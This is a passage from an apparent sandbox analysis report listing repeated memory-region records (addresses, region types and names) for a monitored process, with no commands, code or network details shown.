entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3125 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3154 start_va = 0x28c0000 end_va = 0x28c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 3155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3175 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3176 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 3177 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3207 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3208 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3209 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3214 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3215 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3216 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3222 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3223 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3229 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3245 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3246 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3247 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3248 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3249 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3250 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3251 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3252 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3253 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3254 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3255 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3256 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3257 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3258 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3259 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3260 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3261 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3262 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3263 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3264 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3265 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3266 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3267 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3268 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3269 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3270 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3271 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3272 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3273 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3274 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3275 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3276 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3277 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3278 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3279 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3280 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3281 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3282 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3283 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3284 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3285 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3286 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 3287 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3288 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3289 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3290 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3291 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3292 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3293 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3294 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3295 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3296 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3297 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3298 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3299 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3300 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3301 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 3302 start_va = 0x2880000 